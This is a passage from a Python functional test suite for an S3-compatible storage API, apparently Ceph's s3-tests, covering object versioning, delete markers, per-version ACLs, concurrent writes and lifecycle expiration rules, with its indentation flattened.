e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='testobj', Range='bytes=40-50')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 416)
eq(error_code, 'InvalidRange')
@attr(resource='bucket')
@attr(method='create')
@attr(operation='create versioned bucket')
@attr(assertion='can create and suspend bucket versioning')
@attr('versioning')
def test_versioning_bucket_create_suspend():
bucket_name = get_new_bucket()
check_versioning(bucket_name, None)
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
def check_obj_content(client, bucket_name, key, version_id, content):
response = client.get_object(Bucket=bucket_name, Key=key, VersionId=version_id)
if content is not None:
body = _get_body(response)
eq(body, content)
else:
eq(response['DeleteMarker'], True)
def check_obj_versions(client, bucket_name, key, version_ids, contents):
# check to see if objects is pointing at correct version
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
# obj versions in versions come out created last to first not first to last like version_ids & contents
versions.reverse()
i = 0
for version in versions:
eq(version['VersionId'], version_ids[i])
eq(version['Key'], key)
check_obj_content(client, bucket_name, key, version['VersionId'], contents[i])
i += 1
def create_multiple_versions(client, bucket_name, key, num_versions, version_ids = None, contents = None, check_versions = True):
contents = contents or []
version_ids = version_ids or []
for i in range(num_versions):
body = 'content-{i}'.format(i=i)
response = client.put_object(Bucket=bucket_name, Key=key, Body=body)
version_id = response['VersionId']
contents.append(body)
version_ids.append(version_id)
if check_versions:
check_obj_versions(client, bucket_name, key, version_ids, contents)
return (version_ids, contents)
def remove_obj_version(client, bucket_name, key, version_ids, contents, index):
eq(len(version_ids), len(contents))
index = index % len(version_ids)
rm_version_id = version_ids.pop(index)
rm_content = contents.pop(index)
check_obj_content(client, bucket_name, key, rm_version_id, rm_content)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=rm_version_id)
if len(version_ids) != 0:
check_obj_versions(client, bucket_name, key, version_ids, contents)
def clean_up_bucket(client, bucket_name, key, version_ids):
for version_id in version_ids:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id)
client.delete_bucket(Bucket=bucket_name)
def _do_test_create_remove_versions(client, bucket_name, key, num_versions, remove_start_idx, idx_inc):
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
idx = remove_start_idx
for j in range(num_versions):
remove_obj_version(client, bucket_name, key, version_ids, contents, idx)
idx += idx_inc
response = client.list_object_versions(Bucket=bucket_name)
if 'Versions' in response:
print(response['Versions'])
@attr(resource='object')
@attr(method='create')
@attr(operation='create and remove versioned object')
@attr(assertion='can create access and remove appropriate versions')
@attr('versioning')
def test_versioning_obj_create_read_remove():
bucket_name = get_new_bucket()
client = get_client()
client.put_bucket_versioning(Bucket=bucket_name, VersioningConfiguration={'MFADelete': 'Disabled', 'Status': 'Enabled'})
key = 'testobj'
num_versions = 5
_do_test_create_remove_versions(client, bucket_name, key, num_versions, -1, 0)
_do_test_create_remove_versions(client, bucket_name, key, num_versions, -1, 0)
_do_test_create_remove_versions(client, bucket_name, key, num_versions, 0, 0)
_do_test_create_remove_versions(client, bucket_name, key, num_versions, 1, 0)
_do_test_create_remove_versions(client, bucket_name, key, num_versions, 4, -1)
_do_test_create_remove_versions(client, bucket_name, key, num_versions, 3, 3)
@attr(resource='object')
@attr(method='create')
@attr(operation='create and remove versioned object and head')
@attr(assertion='can create access and remove appropriate versions')
@attr('versioning')
def test_versioning_obj_create_read_remove_head():
bucket_name = get_new_bucket()
client = get_client()
client.put_bucket_versioning(Bucket=bucket_name, VersioningConfiguration={'MFADelete': 'Disabled', 'Status': 'Enabled'})
key = 'testobj'
num_versions = 5
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
# removes old head object, checks new one
removed_version_id = version_ids.pop()
contents.pop()
num_versions = num_versions-1
response = client.delete_object(Bucket=bucket_name, Key=key, VersionId=removed_version_id)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, contents[-1])
# add a delete marker
response = client.delete_object(Bucket=bucket_name, Key=key)
eq(response['DeleteMarker'], True)
delete_marker_version_id = response['VersionId']
version_ids.append(delete_marker_version_id)
response = client.list_object_versions(Bucket=bucket_name)
eq(len(response['Versions']), num_versions)
eq(len(response['DeleteMarkers']), 1)
eq(response['DeleteMarkers'][0]['VersionId'], delete_marker_version_id)
clean_up_bucket(client, bucket_name, key, version_ids)
@attr(resource='object')
@attr(method='create')
@attr(operation='create object, then switch to versioning')
@attr(assertion='behaves correctly')
@attr('versioning')
def test_versioning_obj_plain_null_version_removal():
bucket_name = get_new_bucket()
check_versioning(bucket_name, None)
client = get_client()
key = 'testobjfoo'
content = 'fooz'
client.put_object(Bucket=bucket_name, Key=key, Body=content)
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
client.delete_object(Bucket=bucket_name, Key=key, VersionId='null')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
@attr(resource='object')
@attr(method='create')
@attr(operation='create object, then switch to versioning')
@attr(assertion='behaves correctly')
@attr('versioning')
def test_versioning_obj_plain_null_version_overwrite():
bucket_name = get_new_bucket()
check_versioning(bucket_name, None)
client = get_client()
key = 'testobjfoo'
content = 'fooz'
client.put_object(Bucket=bucket_name, Key=key, Body=content)
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
content2 = 'zzz'
response = client.put_object(Bucket=bucket_name, Key=key, Body=content2)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, content2)
version_id = response['VersionId']
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, content)
client.delete_object(Bucket=bucket_name, Key=key, VersionId='null')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
@attr(resource='object')
@attr(method='create')
@attr(operation='create object, then switch to versioning')
@attr(assertion='behaves correctly')
@attr('versioning')
def test_versioning_obj_plain_null_version_overwrite_suspended():
bucket_name = get_new_bucket()
check_versioning(bucket_name, None)
client = get_client()
key = 'testobjbar'
content = 'foooz'
client.put_object(Bucket=bucket_name, Key=key, Body=content)
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
content2 = 'zzz'
response = client.put_object(Bucket=bucket_name, Key=key, Body=content2)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, content2)
response = client.list_object_versions(Bucket=bucket_name)
# original object with 'null' version id still counts as a version
eq(len(response['Versions']), 1)
client.delete_object(Bucket=bucket_name, Key=key, VersionId='null')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
def delete_suspended_versioning_obj(client, bucket_name, key, version_ids, contents):
client.delete_object(Bucket=bucket_name, Key=key)
# clear out old null objects in lists since they will get overwritten
eq(len(version_ids), len(contents))
i = 0
for version_id in version_ids:
if version_id == 'null':
version_ids.pop(i)
contents.pop(i)
i += 1
return (version_ids, contents)
def overwrite_suspended_versioning_obj(client, bucket_name, key, version_ids, contents, content):
client.put_object(Bucket=bucket_name, Key=key, Body=content)
# clear out old null objects in lists since they will get overwritten
eq(len(version_ids), len(contents))
i = 0
for version_id in version_ids:
if version_id == 'null':
version_ids.pop(i)
contents.pop(i)
i += 1
# add new content with 'null' version id to the end
contents.append(content)
version_ids.append('null')
return (version_ids, contents)
@attr(resource='object')
@attr(method='create')
@attr(operation='suspend versioned bucket')
@attr(assertion='suspended versioning behaves correctly')
@attr('versioning')
def test_versioning_obj_suspend_versions():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'testobj'
num_versions = 5
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
delete_suspended_versioning_obj(client, bucket_name, key, version_ids, contents)
delete_suspended_versioning_obj(client, bucket_name, key, version_ids, contents)
overwrite_suspended_versioning_obj(client, bucket_name, key, version_ids, contents, 'null content 1')
overwrite_suspended_versioning_obj(client, bucket_name, key, version_ids, contents, 'null content 2')
delete_suspended_versioning_obj(client, bucket_name, key, version_ids, contents)
overwrite_suspended_versioning_obj(client, bucket_name, key, version_ids, contents, 'null content 3')
delete_suspended_versioning_obj(client, bucket_name, key, version_ids, contents)
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, 3, version_ids, contents)
num_versions += 3
for idx in range(num_versions):
remove_obj_version(client, bucket_name, key, version_ids, contents, idx)
eq(len(version_ids), 0)
eq(len(version_ids), len(contents))
@attr(resource='object')
@attr(method='remove')
@attr(operation='create and remove versions')
@attr(assertion='everything works')
@attr('versioning')
def test_versioning_obj_create_versions_remove_all():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'testobj'
num_versions = 10
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
for idx in range(num_versions):
remove_obj_version(client, bucket_name, key, version_ids, contents, idx)
eq(len(version_ids), 0)
eq(len(version_ids), len(contents))
@attr(resource='object')
@attr(method='remove')
@attr(operation='create and remove versions')
@attr(assertion='everything works')
@attr('versioning')
def test_versioning_obj_create_versions_remove_special_names():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
keys = ['_testobj', '_', ':', ' ']
num_versions = 10
for key in keys:
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
for idx in range(num_versions):
remove_obj_version(client, bucket_name, key, version_ids, contents, idx)
eq(len(version_ids), 0)
eq(len(version_ids), len(contents))
@attr(resource='object')
@attr(method='multipart')
@attr(operation='create and test multipart object')
@attr(assertion='everything works')
@attr('versioning')
def test_versioning_obj_create_overwrite_multipart():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'testobj'
num_versions = 3
contents = []
version_ids = []
for i in range(num_versions):
ret = _do_test_multipart_upload_contents(bucket_name, key, 3)
contents.append(ret)
response = client.list_object_versions(Bucket=bucket_name)
for version in response['Versions']:
version_ids.append(version['VersionId'])
version_ids.reverse()
check_obj_versions(client, bucket_name, key, version_ids, contents)
for idx in range(num_versions):
remove_obj_version(client, bucket_name, key, version_ids, contents, idx)
eq(len(version_ids), 0)
eq(len(version_ids), len(contents))
@attr(resource='object')
@attr(method='multipart')
@attr(operation='list versioned objects')
@attr(assertion='everything works')
@attr('versioning')
def test_versioning_obj_list_marker():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'testobj'
key2 = 'testobj-1'
num_versions = 5
contents = []
version_ids = []
contents2 = []
version_ids2 = []
# for key #1
for i in range(num_versions):
body = 'content-{i}'.format(i=i)
response = client.put_object(Bucket=bucket_name, Key=key, Body=body)
version_id = response['VersionId']
contents.append(body)
version_ids.append(version_id)
# for key #2
for i in range(num_versions):
body = 'content-{i}'.format(i=i)
response = client.put_object(Bucket=bucket_name, Key=key2, Body=body)
version_id = response['VersionId']
contents2.append(body)
version_ids2.append(version_id)
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
# obj versions in versions come out created last to first not first to last like version_ids & contents
versions.reverse()
i = 0
# test the last 5 created objects first
for i in range(5):
version = versions[i]
eq(version['VersionId'], version_ids2[i])
eq(version['Key'], key2)
check_obj_content(client, bucket_name, key2, version['VersionId'], contents2[i])
i += 1
# then the first 5
for j in range(5):
version = versions[i]
eq(version['VersionId'], version_ids[j])
eq(version['Key'], key)
check_obj_content(client, bucket_name, key, version['VersionId'], contents[j])
i += 1
@attr(resource='object')
@attr(method='multipart')
@attr(operation='create and test versioned object copying')
@attr(assertion='everything works')
@attr('versioning')
def test_versioning_copy_obj_version():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'testobj'
num_versions = 3
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
for i in range(num_versions):
new_key_name = 'key_{i}'.format(i=i)
copy_source = {'Bucket': bucket_name, 'Key': key, 'VersionId': version_ids[i]}
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=new_key_name)
response = client.get_object(Bucket=bucket_name, Key=new_key_name)
body = _get_body(response)
eq(body, contents[i])
another_bucket_name = get_new_bucket()
for i in range(num_versions):
new_key_name = 'key_{i}'.format(i=i)
copy_source = {'Bucket': bucket_name, 'Key': key, 'VersionId': version_ids[i]}
client.copy_object(Bucket=another_bucket_name, CopySource=copy_source, Key=new_key_name)
response = client.get_object(Bucket=another_bucket_name, Key=new_key_name)
body = _get_body(response)
eq(body, contents[i])
new_key_name = 'new_key'
copy_source = {'Bucket': bucket_name, 'Key': key}
client.copy_object(Bucket=another_bucket_name, CopySource=copy_source, Key=new_key_name)
response = client.get_object(Bucket=another_bucket_name, Key=new_key_name)
body = _get_body(response)
eq(body, contents[-1])
@attr(resource='object')
@attr(method='delete')
@attr(operation='delete multiple versions')
@attr(assertion='deletes multiple versions of an object with a single call')
@attr('versioning')
def test_versioning_multi_object_delete():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'key'
num_versions = 2
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
versions.reverse()
for version in versions:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version['VersionId'])
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
# now remove again, should all succeed due to idempotency
for version in versions:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version['VersionId'])
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
@attr(resource='object')
@attr(method='delete')
@attr(operation='delete multiple versions')
@attr(assertion='deletes multiple versions of an object and delete marker with a single call')
@attr('versioning')
def test_versioning_multi_object_delete_with_marker():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'key'
num_versions = 2
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
client.delete_object(Bucket=bucket_name, Key=key)
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
delete_markers = response['DeleteMarkers']
version_ids.append(delete_markers[0]['VersionId'])
eq(len(version_ids), 3)
eq(len(delete_markers), 1)
for version in versions:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version['VersionId'])
for delete_marker in delete_markers:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=delete_marker['VersionId'])
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
eq(('DeleteMarkers' in response), False)
for version in versions:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version['VersionId'])
for delete_marker in delete_markers:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=delete_marker['VersionId'])
# now remove again, should all succeed due to idempotency
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
eq(('DeleteMarkers' in response), False)
@attr(resource='object')
@attr(method='delete')
@attr(operation='multi delete create marker')
@attr(assertion='returns correct marker version id')
@attr('versioning')
def test_versioning_multi_object_delete_with_marker_create():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'key'
response = client.delete_object(Bucket=bucket_name, Key=key)
delete_marker_version_id = response['VersionId']
response = client.list_object_versions(Bucket=bucket_name)
delete_markers = response['DeleteMarkers']
eq(len(delete_markers), 1)
eq(delete_marker_version_id, delete_markers[0]['VersionId'])
eq(key, delete_markers[0]['Key'])
@attr(resource='object')
@attr(method='put')
@attr(operation='change acl on an object version changes specific version')
@attr(assertion='works')
@attr('versioning')
def test_versioned_object_acl():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'xyz'
num_versions = 3
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
version_id = version_ids[1]
response = client.get_object_acl(Bucket=bucket_name, Key=key, VersionId=version_id)
display_name = get_main_display_name()
user_id = get_main_user_id()
eq(response['Owner']['DisplayName'], display_name)
eq(response['Owner']['ID'], user_id)
grants = response['Grants']
default_policy = [
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
]
check_grants(grants, default_policy)
client.put_object_acl(ACL='public-read',Bucket=bucket_name, Key=key, VersionId=version_id)
response = client.get_object_acl(Bucket=bucket_name, Key=key, VersionId=version_id)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
client.put_object(Bucket=bucket_name, Key=key)
response = client.get_object_acl(Bucket=bucket_name, Key=key)
grants = response['Grants']
check_grants(grants, default_policy)
@attr(resource='object')
@attr(method='put')
@attr(operation='change acl on an object with no version specified changes latest version')
@attr(assertion='works')
@attr('versioning')
def test_versioned_object_acl_no_version_specified():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'xyz'
num_versions = 3
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
response = client.get_object(Bucket=bucket_name, Key=key)
version_id = response['VersionId']
response = client.get_object_acl(Bucket=bucket_name, Key=key, VersionId=version_id)
display_name = get_main_display_name()
user_id = get_main_user_id()
eq(response['Owner']['DisplayName'], display_name)
eq(response['Owner']['ID'], user_id)
grants = response['Grants']
default_policy = [
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
]
check_grants(grants, default_policy)
client.put_object_acl(ACL='public-read',Bucket=bucket_name, Key=key)
response = client.get_object_acl(Bucket=bucket_name, Key=key, VersionId=version_id)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
def _do_create_object(client, bucket_name, key, i):
body = 'data {i}'.format(i=i)
client.put_object(Bucket=bucket_name, Key=key, Body=body)
def _do_remove_ver(client, bucket_name, key, version_id):
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id)
def _do_create_versioned_obj_concurrent(client, bucket_name, key, num):
t = []
for i in range(num):
thr = threading.Thread(target = _do_create_object, args=(client, bucket_name, key, i))
thr.start()
t.append(thr)
return t
def _do_clear_versioned_bucket_concurrent(client, bucket_name):
t = []
response = client.list_object_versions(Bucket=bucket_name)
for version in response.get('Versions', []):
thr = threading.Thread(target = _do_remove_ver, args=(client, bucket_name, version['Key'], version['VersionId']))
thr.start()
t.append(thr)
return t
def _do_wait_completion(t):
for thr in t:
thr.join()
@attr(resource='object')
@attr(method='put')
@attr(operation='concurrent creation of objects, concurrent removal')
@attr(assertion='works')
# TODO: remove fails_on_rgw when https://tracker.ceph.com/issues/39142 is resolved
@attr('fails_on_rgw')
@attr('versioning')
def test_versioned_concurrent_object_create_concurrent_remove():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'myobj'
num_versions = 5
for i in range(5):
t = _do_create_versioned_obj_concurrent(client, bucket_name, key, num_versions)
_do_wait_completion(t)
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
eq(len(versions), num_versions)
t = _do_clear_versioned_bucket_concurrent(client, bucket_name)
_do_wait_completion(t)
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
@attr(resource='object')
@attr(method='put')
@attr(operation='concurrent creation and removal of objects')
@attr(assertion='works')
@attr('versioning')
def test_versioned_concurrent_object_create_and_remove():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'myobj'
num_versions = 3
all_threads = []
for i in range(3):
t = _do_create_versioned_obj_concurrent(client, bucket_name, key, num_versions)
all_threads.append(t)
t = _do_clear_versioned_bucket_concurrent(client, bucket_name)
all_threads.append(t)
for t in all_threads:
_do_wait_completion(t)
t = _do_clear_versioned_bucket_concurrent(client, bucket_name)
_do_wait_completion(t)
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config')
@attr('lifecycle')
def test_lifecycle_set():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Days': 1}, 'Prefix': 'test1/', 'Status':'Enabled'},
{'ID': 'rule2', 'Expiration': {'Days': 2}, 'Prefix': 'test2/', 'Status':'Disabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get lifecycle config')
@attr('lifecycle')
def test_lifecycle_get():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'test1/', 'Expiration': {'Days': 31}, 'Prefix': 'test1/', 'Status':'Enabled'},
{'ID': 'test2/', 'Expiration': {'Days': 120}, 'Prefix': 'test2/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
response = client.get_bucket_lifecycle_configuration(Bucket=bucket_name)
eq(response['Rules'], rules)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get lifecycle config no id')
@attr('lifecycle')
def test_lifecycle_get_no_id():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'Expiration': {'Days': 31}, 'Prefix': 'test1/', 'Status':'Enabled'},
{'Expiration': {'Days': 120}, 'Prefix': 'test2/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
response = client.get_bucket_lifecycle_configuration(Bucket=bucket_name)
current_lc = response['Rules']
Rule = namedtuple('Rule',['prefix','status','days'])
rules = {'rule1' : Rule('test1/','Enabled',31),
'rule2' : Rule('test2/','Enabled',120)}
for lc_rule in current_lc:
if lc_rule['Prefix'] == rules['rule1'].prefix:
eq(lc_rule['Expiration']['Days'], rules['rule1'].days)
eq(lc_rule['Status'], rules['rule1'].status)
assert 'ID' in lc_rule
elif lc_rule['Prefix'] == rules['rule2'].prefix:
eq(lc_rule['Expiration']['Days'], rules['rule2'].days)
eq(lc_rule['Status'], rules['rule2'].status)
assert 'ID' in lc_rule
else:
# neither of the rules we supplied was returned, something wrong
print("rules not right")
assert False
# The test harness for lifecycle is configured to treat days as 10 second intervals.
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration():
bucket_name = _create_objects(keys=['expire1/foo', 'expire1/bar', 'keep2/foo',
'keep2/bar', 'expire3/foo', 'expire3/bar'])
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Days': 1}, 'Prefix': 'expire1/', 'Status':'Enabled'},
{'ID': 'rule2', 'Expiration': {'Days': 4}, 'Prefix': 'expire3/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
response = client.list_objects(Bucket=bucket_name)
init_objects = response['Contents']
time.sleep(28)
response = client.list_objects(Bucket=bucket_name)
expire1_objects = response['Contents']
time.sleep(10)
response = client.list_objects(Bucket=bucket_name)
keep2_objects = response['Contents']
time.sleep(20)
response = client.list_objects(Bucket=bucket_name)
expire3_objects = response['Contents']
eq(len(init_objects), 6)
eq(len(expire1_objects), 4)
eq(len(keep2_objects), 4)
eq(len(expire3_objects), 2)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration with list-objects-v2')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
@attr('list-objects-v2')
def test_lifecyclev2_expiration():
bucket_name = _create_objects(keys=['expire1/foo', 'expire1/bar', 'keep2/foo',
'keep2/bar', 'expire3/foo', 'expire3/bar'])
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Days': 1}, 'Prefix': 'expire1/', 'Status':'Enabled'},
{'ID': 'rule2', 'Expiration': {'Days': 4}, 'Prefix': 'expire3/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
response = client.list_objects_v2(Bucket=bucket_name)
init_objects = response['Contents']
time.sleep(28)
response = client.list_objects_v2(Bucket=bucket_name)
expire1_objects = response['Contents']
time.sleep(10)
response = client.list_objects_v2(Bucket=bucket_name)
keep2_objects = response['Contents']
time.sleep(20)
response = client.list_objects_v2(Bucket=bucket_name)
expire3_objects = response['Contents']
eq(len(init_objects), 6)
eq(len(expire1_objects), 4)
eq(len(keep2_objects), 4)
eq(len(expire3_objects), 2)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration on versioning enabled bucket')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_versioning_enabled():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
create_multiple_versions(client, bucket_name, "test1/a", 1)
client.delete_object(Bucket=bucket_name, Key="test1/a")
rules=[{'ID': 'rule1', 'Expiration': {'Days': 1}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
time.sleep(30)
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
delete_markers = response['DeleteMarkers']
eq(len(versions), 1)
eq(len(delete_markers), 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration with 1 tag')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_tags1():
bucket_name = get_new_bucket()
client = get_client()
tom_key = 'days1/tom'
tom_tagset = {'TagSet':
[{'Key': 'tom', 'Value': 'sawyer'}]}
client.put_object(Bucket=bucket_name, Key=tom_key, Body='tom_body')
response = client.put_object_tagging(Bucket=bucket_name, Key=tom_key,
Tagging=tom_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
lifecycle_config = {
'Rules': [
{
'Expiration': {
'Days': 1,
},
'ID': 'rule_tag1',
'Filter': {
'Prefix': 'days1/',
'Tag': {
'Key': 'tom',
'Value': 'sawyer'
},
},
'Status': 'Enabled',
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle_config)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
time.sleep(28)
try:
expire_objects = response['Contents']
except KeyError:
expire_objects = []
eq(len(expire_objects), 0)
# factor out common setup code
def setup_lifecycle_tags2(client, bucket_name):
tom_key = 'days1/tom'
tom_tagset = {'TagSet':
[{'Key': 'tom', 'Value': 'sawyer'}]}
client.put_object(Bucket=bucket_name, Key=tom_key, Body='tom_body')
response = client.put_object_tagging(Bucket=bucket_name, Key=tom_key,
Tagging=tom_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
huck_key = 'days1/huck'
huck_tagset = {
'TagSet':
[{'Key': 'tom', 'Value': 'sawyer'},
{'Key': 'huck', 'Value': 'finn'}]}
client.put_object(Bucket=bucket_name, Key=huck_key, Body='huck_body')
response = client.put_object_tagging(Bucket=bucket_name, Key=huck_key,
Tagging=huck_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
lifecycle_config = {
'Rules': [
{
'Expiration': {
'Days': 1,
},
'ID': 'rule_tag1',
'Filter': {
'Prefix': 'days1/',
'Tag': {
'Key': 'tom',
'Value': 'sawyer'
},
'And': {
'Prefix': 'days1',
'Tags': [
{
'Key': 'huck',
'Value': 'finn'
},
]
}
},
'Status': 'Enabled',
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle_config)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
return response
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration with 2 tags')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_tags2():
bucket_name = get_new_bucket()
client = get_client()
response = setup_lifecycle_tags2(client, bucket_name)
time.sleep(28)
response = client.list_objects(Bucket=bucket_name)
expire1_objects = response['Contents']
eq(len(expire1_objects), 1)
@attr(resource='bucket')
@attr(method='put')
